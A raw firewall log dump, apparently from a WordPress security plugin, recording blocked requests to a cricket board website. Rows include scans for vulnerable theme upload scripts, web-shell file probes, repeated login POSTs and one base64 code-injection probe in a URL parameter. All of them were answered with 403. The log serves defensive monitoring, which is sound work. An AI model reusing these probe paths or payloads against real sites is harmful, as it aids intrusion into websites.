Safari\\/537.36\",\"2\":\"https:\\/\\/www.google.com\\/search?\"}','yijQ06REpuJVaPhCDB8sHnf3',0,1674875312.6420,1047,'','GET',403,0,700,0,1,'',0),('195.201.236.200',3284790472,'','https://www.yorkshirecricketboard.org.uk/wp-content/themes/snapture/include/lang_upload.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 13_0_1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/107.0.0.0 Safari\\/537.36\",\"2\":\"https:\\/\\/www.google.com\\/search?\"}','TjQNOosAyJ869rR5gMEdW4mF',0,1674875316.0370,244,'','GET',403,0,700,0,1,'',0),('195.201.236.200',3284790472,'','https://www.yorkshirecricketboard.org.uk/wp-content/themes/theme-deejay/include/lang_upload.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 12; SM-A205U) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/107.0.5304.141 Mobile Safari\\/537.36\",\"2\":\"https:\\/\\/www.google.com\\/search?\"}','GVPM5sQmYhRiIcOnE9kzBHx2',0,1674875344.9487,186,'','GET',403,0,700,0,1,'',0),('195.201.236.200',3284790472,'','https://www.yorkshirecricketboard.org.uk/wp-content/themes/westand/include/lang_upload.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/107.0.0.0 Safari\\/537.36\",\"2\":\"https:\\/\\/www.google.com\\/search?\"}','8lFUJE1SdDHAV0R3gZbf2uP5',0,1674875346.2811,133,'','GET',403,0,700,0,1,'',0),('195.201.236.200',3284790472,'','https://www.yorkshirecricketboard.org.uk/wp-content/themes/bolster-theme/include/lang_upload.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/107.0.0.0 Safari\\/537.36\",\"2\":\"https:\\/\\/www.google.com\\/search?\"}','Oz139QKEC0Ikrvtxg4ai7hRp',0,1674875349.2355,129,'','GET',403,0,700,0,1,'',0),('195.201.236.200',3284790472,'','https://www.yorkshirecricketboard.org.uk/wp-content/themes/soccer-theme/include/lang_upload.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 13_0_1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/107.0.0.0 Safari\\/537.36\",\"2\":\"https:\\/\\/www.google.com\\/search?\"}','F9RrKWTYp2PzkZjeHJLgdqm4',0,1674875356.4443,97,'','GET',403,0,700,0,1,'',0),('195.201.236.200',3284790472,'','https://www.yorkshirecricketboard.org.uk/wp-content/themes/spikes-black/include/lang_upload.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; ONEPLUS A6013) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/107.0.0.0 Mobile Safari\\/537.36\",\"2\":\"https:\\/\\/www.google.com\\/search?\"}','2SXHEKRem47Gu3xTLjlZwvJA',0,1674875371.2901,112,'','GET',403,0,700,0,1,'',0),('195.201.236.200',3284790472,'','https://www.yorkshirecricketboard.org.uk/wp-content/themes/statfort-new/include/lang_upload.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 12; SM-A205U) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/107.0.5304.141 Mobile Safari\\/537.36\",\"2\":\"https:\\/\\/www.google.com\\/search?\"}','vuoBd0y6jwAWxFt3hS85DYgE',0,1674875381.2381,124,'','GET',403,0,700,0,1,'',0),('195.201.236.200',3284790472,'','https://www.yorkshirecricketboard.org.uk/wp-content/themes/soundblast/include/lang_upload.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Lenovo YT-J706X) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/107.0.0.0 Safari\\/537.36\",\"2\":\"https:\\/\\/www.google.com\\/search?\"}','Gg9xubdEZ0h3z1vWmCAXVFTL',0,1674875387.5216,87,'','GET',403,0,700,0,1,'',0),('195.201.236.200',3284790472,'','https://www.yorkshirecricketboard.org.uk/wp-content/themes/aidreform/include/lang_upload.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 12; SM-A205U) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/107.0.5304.141 Mobile Safari\\/537.36\",\"2\":\"https:\\/\\/www.google.com\\/search?\"}','bUML2aZkJ9dnDlvOCIuXFqsw',0,1674875406.5879,119,'','GET',403,0,700,0,1,'',0),('195.201.236.200',3284790472,'','https://www.yorkshirecricketboard.org.uk/wp-content/themes/bolster/include/lang_upload.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/107.0.0.0 Safari\\/537.36\",\"2\":\"https:\\/\\/www.google.com\\/search?\"}','d6O5XUe7rplQDAhSRvzojmgf',0,1674875412.3133,92,'','GET',403,0,700,0,1,'',0),('195.201.236.200',3284790472,'','https://www.yorkshirecricketboard.org.uk/wp-content/themes/rocky-theme/include/lang_upload.php','','{\"1\":\"Mozilla\\/5.0 (iPhone; CPU iPhone OS 16_1 like Mac OS X) AppleWebKit\\/605.1.15 (KHTML, like Gecko) CriOS\\/107.0.5304.101 Mobile\\/15E148 Safari\\/604.1\",\"2\":\"https:\\/\\/www.google.com\\/search?\"}','TzUXOyFhV4QW71tum9DRpljG',0,1674875414.5776,112,'','GET',403,0,700,0,1,'',0),('195.201.236.200',3284790472,'','https://www.yorkshirecricketboard.org.uk/wp-content/themes/statfort/include/lang_upload.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/107.0.0.0 Safari\\/537.36\",\"2\":\"https:\\/\\/www.google.com\\/search?\"}','oK2JkcxGef17FZylqM4vW6As',0,1674875431.8441,95,'','GET',403,0,700,0,1,'',0),('195.201.236.200',3284790472,'','https://www.yorkshirecricketboard.org.uk/wp-content/themes/faith-theme/include/lang_upload.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/107.0.0.0 Safari\\/537.36\",\"2\":\"https:\\/\\/www.google.com\\/search?\"}','jR5g2k0FOG7PS8rWzbuwLhZN',0,1674875441.8936,143,'','GET',403,0,700,0,1,'',0),('195.201.236.200',3284790472,'','https://www.yorkshirecricketboard.org.uk/wp-content/themes/kingclub-theme/include/lang_upload.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/107.0.0.0 Safari\\/537.36\",\"2\":\"https:\\/\\/www.google.com\\/search?\"}','qYaeIj4JbfvV7QxmcZPpWOou',0,1674875453.2350,93,'','GET',403,0,700,0,1,'',0),('195.201.236.200',3284790472,'','https://www.yorkshirecricketboard.org.uk/wp-content/plugins/dsp_dating/wpdating-gallery/lib/server/php/index.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; ONEPLUS A6013) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/107.0.0.0 Mobile Safari\\/537.36\",\"2\":\"https:\\/\\/www.google.com\\/search?\"}','AfgI95BJNa0V3T4spCHu81OP',0,1674875462.7164,117,'','GET',403,0,700,0,1,'',0),('195.201.236.200',3284790472,'','https://www.yorkshirecricketboard.org.uk/wp-content/themes/spikes/include/lang_upload.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; ONEPLUS A6013) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/107.0.0.0 Mobile Safari\\/537.36\",\"2\":\"https:\\/\\/www.google.com\\/search?\"}','PpOmHM4QYXU6RJLgFhSCTBxj',0,1674875467.7309,180,'','GET',403,0,700,0,1,'',0),('195.201.236.200',3284790472,'','https://www.yorkshirecricketboard.org.uk/wp-content/themes/churchlife/include/lang_upload.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 12; SM-A205U) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/107.0.5304.141 Mobile Safari\\/537.36\",\"2\":\"https:\\/\\/www.google.com\\/search?\"}','KuRYHOByv8D2qCdgAPQcfhxU',0,1674875473.9219,140,'','GET',403,0,700,0,1,'',0),('195.201.236.200',3284790472,'','https://www.yorkshirecricketboard.org.uk/wp-content/themes/club-theme/include/lang_upload.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Lenovo YT-J706X) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/107.0.0.0 Safari\\/537.36\",\"2\":\"https:\\/\\/www.google.com\\/search?\"}','1Ogt9TiPueAhb8maqlIBsJWk',0,1674875480.0640,94,'','GET',403,0,700,0,1,'',0),('195.201.236.200',3284790472,'','https://www.yorkshirecricketboard.org.uk/wp-content/themes/footysquare/include/lang_upload.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/107.0.0.0 Safari\\/537.36\",\"2\":\"https:\\/\\/www.google.com\\/search?\"}','ip5lnsIgJCwyMXq3zWxZ9H0u',0,1674875491.7196,95,'','GET',403,0,700,0,1,'',0),('8.210.174.93',148024925,'','https://yorkshirecricketboard.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','VAoE8OyxB4csN290d1UwbLXJ',0,1674887168.3770,161,'','POST',403,0,600,0,1,'',0),('47.114.72.18',796018706,'','https://yorkshirecricketboard.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/47.0.2526.111 Safari\\/537.36 MVisionPlayer\\/1.0.0.0\"}','ZiGY720LstQIkHC9y1hx8jmu',0,1674887232.7869,121,'','POST',403,0,600,0,1,'',0),('40.77.111.208',676163536,'','https://yorkshirecricketboard.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','XtHILCkVlraegQTNEiFb2JxS',0,1674887901.1141,115,'','POST',403,0,600,0,1,'',0),('47.110.72.238',795756782,'','https://yorkshirecricketboard.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/73.0.3683.86 Safari\\/537.36\"}','UDP0CAEo4Mg19TcQxeGn85X6',0,1674906486.2586,302,'','POST',403,0,600,0,1,'',0),('198.98.60.32',3328326688,'','https://yorkshirecricketboard.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; WOW64; rv:30.0) Gecko\\/20100101 Firefox\\/30.0\"}','VDJ9k3vmq5cLzxUitKfGuS7C',0,1674916925.7657,172,'','POST',403,0,600,0,1,'',0),('209.141.48.210',3515691218,'','https://yorkshirecricketboard.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident\\/5.0)\"}','wTjhnvcW907sdf5ya4gREZJx',0,1674921864.9171,157,'','POST',403,0,600,0,1,'',0),('111.230.202.147',1877396115,'','https://yorkshirecricketboard.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/59.0.3071.115 Safari\\/537.36\"}','MydaPWwnINK4UohbRYqS3eF9',0,1674925628.1641,213,'','POST',403,0,600,0,1,'',0),('74.208.190.148',1255194260,'','https://yorkshirecricketboard.org.uk/wsoyanzorng.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','OKFvo9mGVxQJzLY5CXcTi3eH',0,1674930675.1912,127,'','GET',403,0,700,0,1,'',0),('74.208.190.148',1255194260,'','https://yorkshirecricketboard.org.uk/wp-includes/wsoyanzorng.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','lTq94xwcLOCNu1ir2HKPnJem',0,1674930685.9591,149,'','GET',403,0,700,0,1,'',0),('74.208.190.148',1255194260,'','https://yorkshirecricketboard.org.uk/wp-content/wsoyanzorng.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','cM2mDsTJqFVnYh5lpebizvWw',0,1674930695.9268,129,'','GET',403,0,700,0,1,'',0),('74.208.190.148',1255194260,'','https://yorkshirecricketboard.org.uk/wp-admin/wsoyanzorng.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','t8aPwNogJKq7kOrL1izenMb6',0,1674930700.5156,115,'','GET',403,0,700,0,1,'',0),('209.141.44.126',3515690110,'','https://yorkshirecricketboard.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (iPad; CPU OS 7_1_1 like Mac OS X) AppleWebKit\\/537.51.2 (KHTML, like Gecko) Version\\/7.0 Mobile\\/11D201 Safari\\/9537.53\"}','oLbZFa0IVYDTP498eisxckqu',0,1674931917.8855,108,'','POST',403,0,600,0,1,'',0),('128.199.131.42',2160558890,'','https://yorkshirecricketboard.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/60.0.3112.101 Safari\\/537.36\"}','hW1uXCIdnOx7Ms9BaYjfltDr',0,1674932596.1528,163,'','POST',403,0,600,0,1,'',0),('185.135.82.191',3112653503,'','https://yorkshirecricketboard.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/56.0.2924.87 Safari\\/537.36\"}','y7CBEY9ZDkKT0aAbwvhpqsfi',0,1674938730.4447,146,'','POST',403,0,600,0,1,'',0),('158.69.23.79',2655328079,'','https://yorkshirecricketboard.org.uk/wp-content/languages/plugins/plugins.php?wall=IHsKICAgIGVjaG8gJ2FEcml2NCc7CiAgICBleGl0OwogIH0','','{\"1\":\"Linux Mozilla\"}','MfwpPiBneZzuTkdAFbUt3oHY',0,1674943205.8620,104,'','GET',403,0,700,0,1,'',0),('185.2.4.56',3103917112,'','https://yorkshirecricketboard.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/55.0.2883.87 Safari\\/537.36\"}','EpJ0qSw8YBcrFe5z61TdHfM9',0,1674944507.8119,160,'','POST',403,0,600,0,1,'',0),('143.110.152.206',2406389966,'','https://yorkshirecricketboard.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/79.0.3945.88 Safari\\/537.36\"}','ga2HLGCB0e3KVWRwUDXScn56',0,1674950229.3843,162,'','POST',403,0,600,0,1,'',0),('45.61.184.58',759019578,'','https://yorkshirecricketboard.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; WOW64; rv:31.0) Gecko\\/20100101 Firefox\\/31.0\"}','b2A6ezTnURd1sPFBZ79twvCN',0,1674950692.4242,167,'','POST',403,0,600,0,1,'',0),('54.37.156.240',908434672,'','https://yorkshirecricketboard.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/60.0.3112.101 Safari\\/537.36\"}','GZp9rjCUvAw4yQbgtKYufWdh',0,1674956783.0665,200,'','POST',403,0,600,0,1,'',0),('68.183.86.247',1152866039,'','https://yorkshirecricketboard.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/64.0.3282.167 Safari\\/537.36\"}','hd4XUTQvNR6gaYzs8CfqpxO1',0,1674960157.6023,4301,'','POST',403,0,600,0,1,'',0),('167.235.199.14',2817246990,'','https://yorkshirecricketboard.org.uk/wp-content/themes/statfort-new/include/lang_upload.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/107.0.0.0 Safari\\/537.36\",\"2\":\"https:\\/\\/www.google.com\\/search?\"}','kdKDmzufxywRtsbrq19SMa3W',0,1674963464.6036,372,'','GET',403,0,700,0,1,'',0),('167.235.199.14',2817246990,'','https://yorkshirecricketboard.org.uk/wp-content/themes/faith-theme/include/lang_upload.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 13_0_1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/107.0.0.0 Safari\\/537.36\",\"2\":\"https:\\/\\/www.google.com\\/search?\"}','5CYjyvqZMX8nl3fAzBFUJEDk',0,1674963492.5282,199,'','GET',403,0,700,0,1,'',0),('167.235.199.14',2817246990,'','https://yorkshirecricketboard.org.uk/wp-content/themes/snapture/include/lang_upload.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Lenovo YT-J706X) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/107.0.0.0 Safari\\/537.36\",\"2\":\"https:\\/\\/www.google.com\\/search?\"}','5sqx10Ku2c4jztn6EGbDZFYT',0,1674963501.9838,108,'','GET',403,0,700,0,1,'',0),('167.235.199.14',2817246990,'','https://yorkshirecricketboard.org.uk/wp-content/themes/kingclub-theme/include/lang_upload.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/107.0.0.0 Safari\\/537.36\",\"2\":\"https:\\/\\/www.google.com\\/search?\"}','HOsm6RFAwgv2N0UtdrTBlJPM',0,1674963533.8948,113,'','GET',403,0,700,0,1,'',0),('167.235.199.14',2817246990,'','https://yorkshirecricketboard.org.uk/wp-content/themes/club-theme/include/lang_upload.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 12; SM-A205U) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/107.0.5304.141 Mobile Safari\\/537.36\",\"2\":\"https:\\/\\/www.google.com\\/search?\"}','Gq4vlAcn1FMBDVtdLCgeiXJp',0,1674963577.5632,142,'','GET',403,0,700,0,1,'',0),('167.235.199.14',2817246990,'','https://yorkshirecricketboard.org.uk/wp-content/themes/onelife/include/lang_upload.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/107.0.0.0 Safari\\/537.36\",\"2\":\"https:\\/\\/www.google.com\\/search?\"}','R5NYvnf6izU1HFDLWubpAyVX',0,1674963597.2167,115,'','GET',403,0,700,0,1,'',0),('167.235.199.14',2817246990,'','https://yorkshirecricketboard.org.uk/wp-content/themes/spikes-black/include/lang_upload.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 12; SM-A205U) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/107.0.5304.141 Mobile Safari\\/537.36\",\"2\":\"https:\\/\\/www.google.com\\/search?\"}','XRDuta3Y9QkHEP2jBpV45zNh',0,1674963607.1916,119,'','GET',403,0,700,0,1,'',0),('167.235.199.14',2817246990,'','https://yorkshirecricketboard.org.uk/wp-content/themes/rocky-theme/include/lang_upload.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 12; SM-A205U) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/107.0.5304.141 Mobile Safari\\/537.36\",\"2\":\"https:\\/\\/www.google.com\\/search?\"}','Tt5HnqUSrd73mfFCeWsLlwxZ',0,1674963611.9803,111,'','GET',403,0,700,0,1,'',0),('167.235.199.14',2817246990,'','https://yorkshirecricketboard.org.uk/wp-content/themes/bolster-theme/include/lang_upload.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 12; SM-A205U) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/107.0.5304.141 Mobile Safari\\/537.36\",\"2\":\"https:\\/\\/www.google.com\\/search?\"}','pa70j6OysEn2BvTtDoiH18KZ',0,1674963621.1955,157,'','GET',403,0,700,0,1,'',0),('167.235.199.14',2817246990,'','https://yorkshirecricketboard.org.uk/wp-content/themes/churchlife/include/lang_upload.php','','{\"1\":\"Mozilla\\/5.0 (iPhone; CPU iPhone OS 16_1 like Mac OS X) AppleWebKit\\/605.1.15 (KHTML, like Gecko) CriOS\\/107.0.5304.101 Mobile\\/15E148 Safari\\/604.1\",\"2\":\"https:\\/\\/www.google.com\\/search?\"}','nxHDIPTVZrq37mWjdcb5oRFY',0,1674963626.2909,198,'','GET',403,0,700,0,1,'',0),('167.235.199.14',2817246990,'','https://yorkshirecricketboard.org.uk/wp-content/themes/soccer-theme/include/lang_upload.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Lenovo YT-J706X) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/107.0.0.0 Safari\\/537.36\",\"2\":\"https:\\/\\/www.google.com\\/search?\"}','gM8aGVJXoKPkYC1jdi60v3OI',0,1674963638.6954,114,'','GET',403,0,700,0,1,'',0),('167.235.199.14',2817246990,'','https://yorkshirecricketboard.org.uk/wp-content/themes/aidreform/include/lang_upload.php','','{\"1\":\"Mozilla\\/5.0 (iPhone; CPU iPhone OS 16_1 like Mac OS X) AppleWebKit\\/605.1.15 (KHTML, like Gecko) CriOS\\/107.0.5304.101 Mobile\\/15E148 Safari\\/604.1\",\"2\":\"https:\\/\\/www.google.com\\/search?\"}','vTCcgfbdmzNQGrMtPHe2L6li',0,1674963648.2345,148,'','GET',403,0,700,0,1,'',0),('167.235.199.14',2817246990,'','https://yorkshirecricketboard.org.uk/wp-content/themes/soundblast/include/lang_upload.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 12; SM-A205U) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/107.0.5304.141 Mobile Safari\\/537.36\",\"2\":\"https:\\/\\/www.google.com\\/search?\"}','3JthwcysSkEBCzaxR92TVlnL',0,1674963662.4727,129,'','GET',403,0,700,0,1,'',0),('167.235.199.14',2817246990,'','https://yorkshirecricketboard.org.uk/wp-content/themes/theme-deejay/include/lang_upload.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/107.0.0.0 Safari\\/537.36\",\"2\":\"https:\\/\\/www.google.com\\/search?\"}','sBp0VTg6WFZhUuR4d87DCrem',0,1674963666.8302,109,'','GET',403,0,700,0,1,'',0),('167.235.199.14',2817246990,'','https://yorkshirecricketboard.org.uk/wp-content/themes/westand/include/lang_upload.php','','{\"1\":\"Mozilla\\/5.0 (iPhone; CPU iPhone OS 16_1 like Mac OS X) AppleWebKit\\/605.1.15 (KHTML, like Gecko) CriOS\\/107.0.5304.101 Mobile\\/15E148 Safari\\/604.1\",\"2\":\"https:\\/\\/www.google.com\\/search?\"}','8gRnG5hTW2qoQKbf4Oz3EN9P',0,1674963689.7046,118,'','GET',403,0,700,0,1,'',0),('167.235.199.14',2817246990,'','https://yorkshirecricketboard.org.uk/wp-content/plugins/dsp_dating/wpdating-gallery/lib/server/php/index.php','','{\"1\":\"Mozilla\\/5.0 (iPhone; CPU iPhone OS 16_1 like Mac OS X) AppleWebKit\\/605.1.15 (KHTML, like Gecko) CriOS\\/107.0.5304.101 Mobile\\/15E148 Safari\\/604.1\",\"2\":\"https:\\/\\/www.google.com\\/search?\"}','K69Fo3f5nGeXrJHOmQwWBRpy',0,1674963703.4981,180,'','GET',403,0,700,0,1,'',0),('167.235.199.14',2817246990,'','https://yorkshirecricketboard.org.uk/wp-content/themes/footysquare/include/lang_upload.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; ONEPLUS A6013) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/107.0.0.0 Mobile Safari\\/537.36\",\"2\":\"https:\\/\\/www.google.com\\/search?\"}','JEbnFGhSUHXT15LpClNA6Rqy',0,1674963708.3170,105,'','GET',403,0,700,0,1,'',0),('167.235.199.14',2817246990,'','https://yorkshirecricketboard.org.uk/wp-content/themes/statfort/include/lang_upload.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 12; SM-A205U) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/107.0.5304.141 Mobile Safari\\/537.36\",\"2\":\"https:\\/\\/www.google.com\\/search?\"}','pLkFhJWVfKoaPc0ylxMUCB9d',0,1674963740.6811,173,'','GET',403,0,700,0,1,'',0),('167.235.199.14',2817246990,'','https://yorkshirecricketboard.org.uk/wp-content/themes/spikes/include/lang_upload.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 13_0_1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/107.0.0.0 Safari\\/537.36\",\"2\":\"https:\\/\\/www.google.com\\/search?\"}','OzwJNKbYG4Rilv21QL5hmpMC',0,1674963750.4024,153,'','GET',403,0,700,0,1,'',0),('167.235.199.14',2817246990,'','https://yorkshirecricketboard.org.uk/wp-content/themes/bolster/include/lang_upload.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 12; SM-A205U) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/107.0.5304.141 Mobile Safari\\/537.36\",\"2\":\"https:\\/\\/www.google.com\\/search?\"}','6TH8p5Xon3dWASQfgO0REZel',0,1674963754.9986,137,'','GET',403,0,700,0,1,'',0),('185.2.4.33',3103917089,'','https://yorkshirecricketboard.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/70.0.3538.67 Safari\\/537.36\"}','tWzwOHSasKEXFydq9NBn5ibk',0,1674967680.8496,783,'','POST',403,0,600,0,1,'',0),('107.189.6.203',1807550155,'','https://yorkshirecricketboard.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_9_4) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/35.0.1916.153 Safari\\/537.36\"}','dK0boAZ3VfkmsX6DOxhziU5j',0,1674968052.9514,126,'','POST',403,0,600,0,1,'',0),('209.141.47.94',3515690846,'','https://yorkshirecricketboard.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/36.0.1985.125 Safari\\/537.36\"}','7WmgKE65idxXuSlOt8Aqvryc',0,1674970469.9188,119,'','POST',403,0,600,0,1,'',0),('64.227.6.141',1088620173,'','https://yorkshirecricketboard.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/70.0.3538.102 Safari\\/537.36\"}','IHhgUcQzmr40qZyiVAM716bj',0,1674971259.6176,185,'','POST',403,0,600,0,1,'',0),('148.72.214.194',2487801538,'','https://yorkshirecricketboard.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/80.0.3987.132 Safari\\/537.36\"}','wor8qZHY3kxfDQC2bezEPS6n',0,1674974774.7387,178,'','POST',403,0,600,0,1,'',0),('107.189.3.40',1807549224,'','https://yorkshirecricketboard.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_9_0) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/36.0.1985.125 Safari\\/537.36\"}','MVhqKENWYjFvIHreCkR5O8zg',0,1674979463.1563,123,'','POST',403,0,600,0,1,'',0),('5.188.62.26',96222746,'','https://yorkshirecricketboard.org.uk/wp-login.php?wp_lang=en_US','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/101.0.4951.67 Safari\\/537.36\"}','Ox89yLmuBKY0r2bHv4NTCWwt',0,1674980669.3566,139,'','POST',403,0,600,0,1,'',0),('51.91.151.60',861640508,'','https://yorkshirecricketboard.org.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/56.0.2924.87 